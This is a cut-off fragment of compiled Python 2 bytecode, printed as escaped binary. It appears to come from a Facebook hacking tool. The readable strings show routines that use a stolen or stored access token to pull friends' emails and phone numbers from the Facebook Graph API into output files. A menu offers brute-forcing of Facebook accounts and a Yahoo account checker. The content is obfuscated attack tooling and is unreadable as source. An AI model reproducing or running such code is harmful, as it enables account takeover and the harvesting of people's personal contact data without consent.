x01\x00Xy\x08\x02t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\n\x00GHt\x0b\x00d\x08\x00\x83\x01\x00}\x01\x00y>\x00t\x0c\x00j\r\x00d\t\x00|\x01\x00\x17d\n\x00\x17|\x00\x00\x17\x83\x01\x00}\x02\x00t\x0e\x00j\x0f\x00|\x02\x00j\x10\x00\x83\x01\x00}\x03\x00d\x0b\x00|\x03\x00
d\x0c\x00\x19\x17GHWn\'\x00\x04t\x11\x00k\n\x00r\r\x01\x01\x01\x01d\r\x00GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01n\x01\x00Xt\x0c\x00j\r\x00d\t\x00|\x01\x00\x17d\x0f\x00\x17|\x00\x00\x17\x83\x01\x00}\x04\x00t\x0e\x00j\x0f\x00|\x04\x00j\x10\x00\x83\x01\x00}\x05\x00t\x13\x00d\x10\x00\x83\x01\x00\x01d\x11\x00d\x12\x00\x14GHt\x02\x00d\x13\x00d\x14\x00\x83\x02\x00}\x06\x00x\xcb\x00|\x05\x00d\x15\x00\x19D]\xbf\x00}\x07\x00t\x0c\x00j\r\x00d\t\x00|\x07\x00d\x16\x00\x19\x17d\n\x00\x17|\x00\x00\x17\x83\x01\x00}\x08\x00t\x0e\x00j\x0f\x00|\x08\x00j\x10\x00\x83\x01\x00}\t\x00yt\x00t\x14\x00j\x15\x00|\t\x00d\x17\x00\x19\x83\x01\x00\x01|\x06\x00j\x16\x00|\t\x00d\x17\x00\x19d\x18\x00\x17\x83\x01\x00\x01d\x19\x00t\x17\x00t\x18\x00t\x14\x00\x83\x01\x00\x83\x01\x00\x17d\x1a\x00\x17|\t\x00d\x17\x00\x19\x17d\x1b\x00\x17|\t\x00d\x0c\x00\x19\x17d\x18\x00\x17Gt\x19\x00j\x1a\x00j\x1b\x00\x83\x00\x00\x01t\x05\x00j\x06\x00d\x1c\x00\x83\x01\x00\x01Wqh\x01\x04t\x11\x00k\n\x00r&\x02\x01\x01\x01qh\x01Xqh\x01W|\x06\x00j\x1c\x00\x83\x00\x00\x01d\x11\x00d\x12\x00\x14GHd\x1d\x00GHd\x1e\x00t\x18\x00t\x14\x00\x83\x01\x00\x16GHt\x0b\x00d\x1f\x00\x83\x01\x00}\n\x00t\x00\x00j\x1d\x00d\x13\x00d \x00|\n\x00\x17\x83\x02\x00\x01d!\x00|\n\x00\x17GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01Wn\x9b\x00\x04t\x04\x00k\n\x00r\xb6\x02\x01\x01\x01d"\x00GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01nu\x00\x04t\x1e\x00t\x1f\x00f\x02\x00k\n\x00r\xe2\x02\x01\x01\x01d#\x00GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01nI\x00\x04t\x11\x00k\n\x00r\x08\x03\x01\x01\x01d$\x00GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01n#\x00\x04t\x0c\x00j \x00j!\x00k\n\x00r*\x03\x01\x01\x01d%\x00GHt"\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S(&\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] 
Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00R\x90\x00\x00\x00s2\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mInput ID friend \x1b[1;91m: \x1b[1;97ms\x1b\x00\x00\x00https://graph.facebook.com/s\x0e\x00\x00\x00?access_token=s7\x00\x00\x00\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m R0\x00\x00\x00s\x1b\x00\x00\x00\x1b[1;91m[!] Friend not founds\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s\x16\x00\x00\x00/friends?access_token=s?\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mGet all friend email from friend \x1b[1;97m...i*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90s\x1b\x00\x00\x00out/em_teman_from_teman.txtR\x11\x00\x00\x00Rl\x00\x00\x00Rj\x00\x00\x00R?\x00\x00\x00s\x01\x00\x00\x00\ns\x11\x00\x00\x00\r\x1b[1;97m[ \x1b[1;92ms\x1a\x00\x00\x00\x1b[1;97m ]\x1b[1;97m=> \x1b[1;97ms\x03\x00\x00\x00 | g-C\x1c\xeb\xe26\x1a?sE\x00\x00\x00\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mSuccessfully get email \x1b[1;97m....s1\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mTotal Email \x1b[1;91m: \x1b[1;97m%ss7\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mSave file with name\x1b[1;91m :\x1b[1;97m s\x04\x00\x00\x00out/s2\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mFile saved \x1b[1;91m: \x1b[1;97mout/s\x1e\x00\x00\x00\x1b[1;91m[!] Error creating files\x12\x00\x00\x00\x1b[1;91m[!] Stoppeds\x10\x00\x00\x00\x1b[1;91m[!] 
Errors\x1a\x00\x00\x00\x1b[1;91m[\xe2\x9c\x96] No connection(#\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R\x91\x00\x00\x00R\x92\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00R,\x00\x00\x00R\x80\x00\x00\x00R \x00\x00\x00t\x0b\x00\x00\x00emfromtemanR\x94\x00\x00\x00R\x19\x00\x00\x00R\x17\x00\x00\x00R\x0e\x00\x00\x00R\x06\x00\x00\x00R\x18\x00\x00\x00R\x1b\x00\x00\x00Rg\x00\x00\x00R\x95\x00\x00\x00R\x96\x00\x00\x00R\x97\x00\x00\x00Ri\x00\x00\x00R\x01\x00\x00\x00R\x08\x00\x00\x00(\x0b\x00\x00\x00R4\x00\x00\x00R\x9c\x00\x00\x00R\x9d\x00\x00\x00R\x9e\x00\x00\x00R\'\x00\x00\x00Rm\x00\x00\x00R\x98\x00\x00\x00R\x13\x00\x00\x00R\x10\x00\x00\x00R\x1e\x00\x00\x00R\x99\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\x8c\x00\x00\x00\xff\x02\x00\x00s\x80\x00\x00\x00\x00\x01\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\x03\x01\x11\x01\r\x01\x04\x01\x03\x01\r\x01\x05\x01\x0c\x01\x03\x01\x1b\x01\x12\x01\x11\x01\r\x01\x05\x01\n\x01\x0b\x01\x1b\x01\x12\x01\n\x01\t\x01\x0f\x01\x11\x01\x1f\x01\x12\x01\x03\x01\x11\x01\x15\x010\x00\r\x00\x11\x01\r\x01\x08\x01\n\x01\t\x01\x05\x01\x0f\x01\x0c\x01\x14\x01\t\x01\n\x01\x0b\x01\r\x01\x05\x01\n\x01\n\x01\x13\x01\x05\x01\n\x01\n\x01\r\x01\x05\x01\n\x01\n\x01\x13\x01\x05\x01c\x00\x00\x00\x00\x08\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s\xb9\x02\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x04\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xy\x11\x00t\x00\x00j\x08\x00d\x07\x00\x83\x01\x00\x01Wn\x11\x00\x04t\t\x00k\n\x00r\x84\x00\x01\x01\x01n\x01\x00Xy\x92\x01t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\n\x00GHt\x0b\x00d\x08\x00\x83\x01\x00\x01d\t\x00d\n\x00\x14GHd\x0
b\x00|\x00\x00\x17}\x01\x00t\x0c\x00j\r\x00|\x01\x00\x83\x01\x00}\x02\x00t\x0e\x00j\x0f\x00|\x02\x00j\x10\x00\x83\x01\x00}\x03\x00t\x02\x00d\x0c\x00d\r\x00\x83\x02\x00}\x04\x00x\xcb\x00|\x03\x00d\x0e\x00\x19D]\xbf\x00}\x05\x00t\x0c\x00j\r\x00d\x0f\x00|\x05\x00d\x10\x00\x19\x17d\x11\x00\x17|\x00\x00\x17\x83\x01\x00}\x06\x00t\x0e\x00j\x0f\x00|\x06\x00j\x10\x00\x83\x01\x00}\x03\x00yt\x00t\x11\x00j\x12\x00|\x03\x00d\x12\x00\x19\x83\x01\x00\x01|\x04\x00j\x13\x00|\x03\x00d\x12\x00\x19d\x13\x00\x17\x83\x01\x00\x01d\x14\x00t\x14\x00t\x15\x00t\x11\x00\x83\x01\x00\x83\x01\x00\x17d\x15\x00\x17|\x03\x00d\x12\x00\x19\x17d\x16\x00\x17|\x03\x00d\x17\x00\x19\x17d\x13\x00\x17Gt\x16\x00j\x17\x00j\x18\x00\x83\x00\x00\x01t\x05\x00j\x06\x00d\x18\x00\x83\x01\x00\x01Wq\xf2\x00\x04t\x19\x00k\n\x00r\xb0\x01\x01\x01\x01q\xf2\x00Xq\xf2\x00W|\x04\x00j\x1a\x00\x83\x00\x00\x01d\t\x00d\n\x00\x14GHd\x19\x00GHd\x1a\x00t\x15\x00t\x11\x00\x83\x01\x00\x16GHt\x1b\x00d\x1b\x00\x83\x01\x00}\x07\x00t\x00\x00j\x1c\x00d\x0c\x00d\x1c\x00|\x07\x00\x17\x83\x02\x00\x01d\x1d\x00|\x07\x00\x17GHt\x1b\x00d\x1e\x00\x83\x01\x00\x01t\x1d\x00\x83\x00\x00\x01Wn\x9b\x00\x04t\x04\x00k\n\x00r@\x02\x01\x01\x01d\x1f\x00GHt\x1b\x00d\x1e\x00\x83\x01\x00\x01t\x1d\x00\x83\x00\x00\x01nu\x00\x04t\x1e\x00t\x1f\x00f\x02\x00k\n\x00rl\x02\x01\x01\x01d \x00GHt\x1b\x00d\x1e\x00\x83\x01\x00\x01t\x1d\x00\x83\x00\x00\x01nI\x00\x04t\x19\x00k\n\x00r\x92\x02\x01\x01\x01d!\x00GHt\x1b\x00d\x1e\x00\x83\x01\x00\x01t\x1d\x00\x83\x00\x00\x01n#\x00\x04t\x0c\x00j \x00j!\x00k\n\x00r\xb4\x02\x01\x01\x01d"\x00GHt"\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S(#\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] 
Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00R\x90\x00\x00\x00s:\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mGet all friend number phone \x1b[1;97m...i*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90s3\x00\x00\x00https://graph.facebook.com/me/friends?access_token=s\x13\x00\x00\x00out/nomer_teman.txtR\x11\x00\x00\x00Rl\x00\x00\x00s\x1b\x00\x00\x00https://graph.facebook.com/Rj\x00\x00\x00s\x0e\x00\x00\x00?access_token=Rw\x00\x00\x00s\x01\x00\x00\x00\ns\x11\x00\x00\x00\r\x1b[1;97m[ \x1b[1;92ms\x1a\x00\x00\x00\x1b[1;97m ]\x1b[1;97m=> \x1b[1;97ms\x03\x00\x00\x00 | R0\x00\x00\x00g-C\x1c\xeb\xe26\x1a?sF\x00\x00\x00\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mSuccessfully get number \x1b[1;97m....s2\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mTotal Number \x1b[1;91m: \x1b[1;97m%ss7\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mSave file with name\x1b[1;91m :\x1b[1;97m s\x04\x00\x00\x00out/s2\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mFile saved \x1b[1;91m: \x1b[1;97mout/s\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s\x1e\x00\x00\x00\x1b[1;91m[!] Error creating files\x12\x00\x00\x00\x1b[1;91m[!] Stoppeds\x10\x00\x00\x00\x1b[1;91m[!] 
Errors\x1a\x00\x00\x00\x1b[1;91m[\xe2\x9c\x96] No connection(#\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R\x91\x00\x00\x00R\x92\x00\x00\x00R.\x00\x00\x00R \x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00t\x02\x00\x00\x00hpR\x94\x00\x00\x00R\x19\x00\x00\x00R\x17\x00\x00\x00R\x0e\x00\x00\x00R\x06\x00\x00\x00R\x18\x00\x00\x00R\x1b\x00\x00\x00R,\x00\x00\x00Rg\x00\x00\x00R/\x00\x00\x00R\x95\x00\x00\x00R\x80\x00\x00\x00R\x96\x00\x00\x00R\x97\x00\x00\x00Ri\x00\x00\x00R\x01\x00\x00\x00R\x08\x00\x00\x00(\x08\x00\x00\x00R4\x00\x00\x00Rk\x00\x00\x00R\'\x00\x00\x00R\x1e\x00\x00\x00R\x98\x00\x00\x00t\x01\x00\x00\x00nR\x10\x00\x00\x00R\x99\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\x8d\x00\x00\x00@\x03\x00\x00sp\x00\x00\x00\x00\x01\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\x03\x01\x11\x01\r\x01\x04\x01\x03\x01\r\x01\x05\x01\n\x01\t\x01\n\x01\x0f\x01\x12\x01\x0f\x01\x11\x01\x1f\x01\x12\x01\x03\x01\x11\x01\x15\x010\x00\r\x00\x11\x01\r\x01\x08\x01\n\x01\t\x01\x05\x01\x0f\x01\x0c\x01\x14\x01\t\x01\n\x01\x0b\x01\r\x01\x05\x01\n\x01\n\x01\x13\x01\x05\x01\n\x01\n\x01\r\x01\x05\x01\n\x01\n\x01\x13\x01\x05\x01c\x00\x00\x00\x00\x0b\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s/\x03\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x04\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xy\x11\x00t\x00\x00j\x08\x00d\x07\x00\x83\x01\x00\x01Wn\x11\x00\x04t\t\x00k\n\x00r\x84\x00\x01\x01\x01n\x01\x00Xy\x08\x02t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\n\x00GHt\x0b\x00d\x08\x00\x83\x01\x00}\x01\x00y>\x00t\x0c\x00j\r\x00d\t\x00|\x01\x00\x17d\n\x00\x17|\x00\x00\x17\x83\x01\x00}\x02\x00t\x0e\x00j\x0f\x00|\x02\x00j\x10\x00\x83\x01\x00}\x03\x00d\x0b
\x00|\x03\x00d\x0c\x00\x19\x17GHWn\'\x00\x04t\x11\x00k\n\x00r\r\x01\x01\x01\x01d\r\x00GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01n\x01\x00Xt\x0c\x00j\r\x00d\t\x00|\x01\x00\x17d\x0f\x00\x17|\x00\x00\x17\x83\x01\x00}\x04\x00t\x0e\x00j\x0f\x00|\x04\x00j\x10\x00\x83\x01\x00}\x05\x00t\x13\x00d\x10\x00\x83\x01\x00\x01d\x11\x00d\x12\x00\x14GHt\x02\x00d\x13\x00d\x14\x00\x83\x02\x00}\x06\x00x\xcb\x00|\x05\x00d\x15\x00\x19D]\xbf\x00}\x07\x00t\x0c\x00j\r\x00d\t\x00|\x07\x00d\x16\x00\x19\x17d\n\x00\x17|\x00\x00\x17\x83\x01\x00}\x08\x00t\x0e\x00j\x0f\x00|\x08\x00j\x10\x00\x83\x01\x00}\t\x00yt\x00t\x14\x00j\x15\x00|\t\x00d\x17\x00\x19\x83\x01\x00\x01|\x06\x00j\x16\x00|\t\x00d\x17\x00\x19d\x18\x00\x17\x83\x01\x00\x01d\x19\x00t\x17\x00t\x18\x00t\x14\x00\x83\x01\x00\x83\x01\x00\x17d\x1a\x00\x17|\t\x00d\x17\x00\x19\x17d\x1b\x00\x17|\t\x00d\x0c\x00\x19\x17d\x18\x00\x17Gt\x19\x00j\x1a\x00j\x1b\x00\x83\x00\x00\x01t\x05\x00j\x06\x00d\x1c\x00\x83\x01\x00\x01Wqh\x01\x04t\x11\x00k\n\x00r&\x02\x01\x01\x01qh\x01Xqh\x01W|\x06\x00j\x1c\x00\x83\x00\x00\x01d\x11\x00d\x12\x00\x14GHd\x1d\x00GHd\x1e\x00t\x18\x00t\x14\x00\x83\x01\x00\x16GHt\x0b\x00d\x1f\x00\x83\x01\x00}\n\x00t\x00\x00j\x1d\x00d\x13\x00d \x00|\n\x00\x17\x83\x02\x00\x01d!\x00|\n\x00\x17GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01Wn\x9b\x00\x04t\x04\x00k\n\x00r\xb6\x02\x01\x01\x01d"\x00GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01nu\x00\x04t\x1e\x00t\x1f\x00f\x02\x00k\n\x00r\xe2\x02\x01\x01\x01d#\x00GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01nI\x00\x04t\x11\x00k\n\x00r\x08\x03\x01\x01\x01d$\x00GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01n#\x00\x04t\x0c\x00j \x00j!\x00k\n\x00r*\x03\x01\x01\x01d%\x00GHt"\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S(&\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] 
Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00R\x90\x00\x00\x00s2\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mInput ID friend \x1b[1;91m: \x1b[1;97ms\x1b\x00\x00\x00https://graph.facebook.com/s\x0e\x00\x00\x00?access_token=s7\x00\x00\x00\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m R0\x00\x00\x00s\x1b\x00\x00\x00\x1b[1;91m[!] Friend not founds\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s\x16\x00\x00\x00/friends?access_token=s@\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mGet all friend number from friend \x1b[1;97m...i*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90s\x1b\x00\x00\x00out/no_teman_from_teman.txtR\x11\x00\x00\x00Rl\x00\x00\x00Rj\x00\x00\x00Rw\x00\x00\x00s\x01\x00\x00\x00\ns\x11\x00\x00\x00\r\x1b[1;97m[ \x1b[1;92ms\x1a\x00\x00\x00\x1b[1;97m ]\x1b[1;97m=> \x1b[1;97ms\x03\x00\x00\x00 | g-C\x1c\xeb\xe26\x1a?sF\x00\x00\x00\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mSuccessfully get number \x1b[1;97m....s2\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mTotal Number \x1b[1;91m: \x1b[1;97m%ss7\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mSave file with name\x1b[1;91m :\x1b[1;97m s\x04\x00\x00\x00out/s2\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mFile saved \x1b[1;91m: \x1b[1;97mout/s\x1e\x00\x00\x00\x1b[1;91m[!] Error creating files\x12\x00\x00\x00\x1b[1;91m[!] Stoppeds\x10\x00\x00\x00\x1b[1;91m[!] 
Errors\x1a\x00\x00\x00\x1b[1;91m[\xe2\x9c\x96] No connection(#\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R\x91\x00\x00\x00R\x92\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00R,\x00\x00\x00R\x80\x00\x00\x00R \x00\x00\x00t\x0b\x00\x00\x00hpfromtemanR\x94\x00\x00\x00R\x19\x00\x00\x00R\x17\x00\x00\x00R\x0e\x00\x00\x00R\x06\x00\x00\x00R\x18\x00\x00\x00R\x1b\x00\x00\x00Rg\x00\x00\x00R\x95\x00\x00\x00R\x96\x00\x00\x00R\x97\x00\x00\x00Ri\x00\x00\x00R\x01\x00\x00\x00R\x08\x00\x00\x00(\x0b\x00\x00\x00R4\x00\x00\x00R\x9c\x00\x00\x00R\x9d\x00\x00\x00R\x9e\x00\x00\x00R\'\x00\x00\x00Rm\x00\x00\x00R\x98\x00\x00\x00R\x13\x00\x00\x00R\x10\x00\x00\x00R\x1e\x00\x00\x00R\x99\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\x8e\x00\x00\x00y\x03\x00\x00s\x80\x00\x00\x00\x00\x01\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\x03\x01\x11\x01\r\x01\x04\x01\x03\x01\r\x01\x05\x01\x0c\x01\x03\x01\x1b\x01\x12\x01\x11\x01\r\x01\x05\x01\n\x01\x0b\x01\x1b\x01\x12\x01\n\x01\t\x01\x0f\x01\x11\x01\x1f\x01\x12\x01\x03\x01\x11\x01\x15\x010\x00\r\x00\x11\x01\r\x01\x08\x01\n\x01\t\x01\x05\x01\x0f\x01\x0c\x01\x14\x01\t\x01\n\x01\x0b\x01\r\x01\x05\x01\n\x01\n\x01\x13\x01\x05\x01\n\x01\n\x01\r\x01\x05\x01\n\x01\n\x01\x13\x01\x05\x01c\x00\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\xa0\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x04\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x08\x00GHd\x07\x00GHd\x08\x00GHd\t\x00GHd\n\x00GHd\x0b\x00GHd\x0c\x00GHd\r\x00GHt\t\x00\x83\x00\x00\x01d\x00\x00S(\x0e\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1
a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00sN\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m1.\x1b[1;97m Mini Hack Facebook(\x1b[1;92mTarget\x1b[1;97m)s?\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m2.\x1b[1;97m Multi Bruteforce FacebooksE\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m3.\x1b[1;97m Super Multi Bruteforce FacebooksF\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m4.\x1b[1;97m BruteForce(\x1b[1;92mTarget\x1b[1;97m)s3\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m5.\x1b[1;97m Yahoo Checkers*\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;91m0.\x1b[1;97m Backs\x03\x00\x00\x00\xe2\x95\x91(\n\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R.\x00\x00\x00t\n\x00\x00\x00hack_pilih(\x01\x00\x00\x00R4\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>Rv\x00\x00\x00\xba\x03\x00\x00s$\x00\x00\x00\x00\x01\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\r\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01c\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s\xc2\x00\x00\x00t\x00\x00d\x01\x00\x83\x01\x00}\x00\x00|\x00\x00d\x02\x00k\x02\x00r\'\x00d\x03\x00GHt\x01\x00\x83\x00\x00\x01n\x97\x00|\x00\x00d\x04\x00k\x02\x00r=\x00t\x02\x00\x83\x00\x00\x01n\x81\x00|\x00\x00d\x05\x00k\x02\x00rZ\x00t\x03\x00\x83\x00\x00\x01t\x04\x00\x83\x00\x00\x01nd\x00|\x00\x00d\x06\x00k\x02\x00rp\x00t\x05\x00\x83\x00\x00\x01nN\x00|\x00\x00d\x07\x00k\x02\x00r\x86\x00t\x06\x00\x83\x00\x00\x01n8\x00|\x00\x00d\x08\x00k\x02\x00r\x9c\x00t\x07\x00\x83\x00\x00\x01n"\x00|\x00\x00d\t\x00k\x02\x00r\xb2\x00t\x08\x00\x83\x00\x00\x01n\x0c\x00d\x03\x00GHt\x01\x00\x83\x00\x00\x01d\x00\x00S(\n\x00\x00\x00Ns\x1d\x00\x00\x00\x1b[1;97m\xe2\x95\x9a\xe2\x95\x90\x1b[1;91mD \x1b[1;97mR\n\x00\x00\x00s\x16\x00\x00\x00\x1b[1;91m[!] 
Wrong inputR8\x00\x00\x00R9\x00\x00\x00Rs\x00\x00\x00Rt\x00\x00\x00R\x81\x00\x00\x00R:\x00\x00\x00(\t\x00\x00\x00R/\x00\x00\x00R\xaa\x00\x00\x00t\x04\x00\x00\x00minit\x05\x00\x00\x00crackt\x05\x00\x00\x00hasilt\x05\x00\x00\x00supert\x05\x00\x00\x00brutet\n\x00\x00\x00menu_yahooR+\x00\x00\x00(\x01\x00\x00\x00t\x04\x00\x00\x00hack(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\xaa\x00\x00\x00\xce\x03\x00\x00s&\x00\x00\x00\x00\x01\x0c\x01\x0c\x01\x05\x01\n\x01\x0c\x01\n\x01\x0c\x01\x07\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x02\x05\x01c\x00\x00\x00\x00\x10\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\x05\x07\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x04\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x08\x00GHd\x07\x00GHd\x08\x00d\t\x00\x14GHyW\x06t\t\x00d\n\x00\x83\x01\x00}\x01\x00t\n\x00d\x0b\x00\x83\x01\x00\x01t\x0b\x00j\x0c\x00d\x0c\x00|\x01\x00\x17d\r\x00\x17|\x00\x00\x17\x83\x01\x00}\x02\x00t\r\x00j\x0e\x00|\x02\x00j\x0f\x00\x83\x01\x00}\x03\x00d\x0e\x00|\x03\x00d\x0f\x00\x19\x17GHt\n\x00d\x10\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x11\x00\x83\x01\x00\x01t\n\x00d\x12\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x11\x00\x83\x01\x00\x01d\x08\x00d\t\x00\x14GH|\x03\x00d\x13\x00\x19d\x14\x00\x17}\x04\x00t\x10\x00j\x11\x00d\x15\x00|\x01\x00\x17d\x16\x00\x17|\x04\x00\x17d\x17\x00\x17\x83\x01\x00}\x05\x00t\r\x00j\x12\